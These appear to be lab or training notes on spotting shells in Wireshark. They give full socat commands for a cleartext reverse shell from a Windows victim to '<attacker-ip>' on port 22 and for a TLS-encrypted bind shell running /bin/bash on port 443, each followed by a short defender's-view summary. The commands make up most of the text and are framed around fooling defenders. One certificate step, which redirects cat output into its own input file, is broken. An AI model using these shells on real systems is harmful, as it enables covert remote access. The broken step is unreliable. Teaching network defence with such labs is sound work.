Wireshark and Encrypted Traffic

Scenario 1: Unencrypted Reverse Shell over Port 22

Objective:

Create a reverse shell using socat to simulate a connection that may fool defenders by using port 22 (commonly used for SSH).

Commands:

Kali Linux (Attacker's Listener):

socat -d -d TCP-LISTEN:22 STDOUT

Explanation:

• -d -d: Enables verbose/debug output.

• TCP-LISTEN:22: Listens on TCP port 22.

• STDOUT: Outputs received data to the screen.

Windows Victim (Reverse Shell):

socat.exe TCP:<attacker-ip>:22 EXEC:'cmd.exe',pipes

Explanation:

• Connects back to the attacker on port 22.

• Executes cmd.exe, piping input/output over the connection.

---

Defender's View (Wireshark):

• Traffic on port 22 is expected to be SSH, which is encrypted.

• However, this traffic is in cleartext, revealing:

  • Command inputs

  • Responses

  • Even passwords

🔴 Red Flag: Cleartext data on port 22 is suspicious.

---

Scenario 2: Encrypted Bind Shell over Port 443

Objective:

Use an OpenSSL-encrypted bind shell that mimics HTTPS traffic (port 443).

Generate a Self-signed Certificate:

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.pem

Combine key and cert if needed:

cat bind_shell.key bind_shell.pem > bind_shell.pem

---

Commands:

Host (Target machine with bind shell):

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Explanation:

• OPENSSL-LISTEN:443: Listens on port 443 with SSL/TLS encryption.

• cert=bind_shell.pem: Uses the certificate to encrypt traffic.

• EXEC:/bin/bash: Binds the shell to the connection.

• fork: Handles multiple connections.

Attacker (Kali):

socat OPENSSL:<target-ip>:443,verify=0 STDIO

Connects securely to the encrypted bind shell.

---

Defender's View (Wireshark):

• Traffic on port 443 appears to be legitimate HTTPS.

• Content is encrypted, so commands and responses are hidden.

More stealthy and harder for defenders to inspect.

Practicals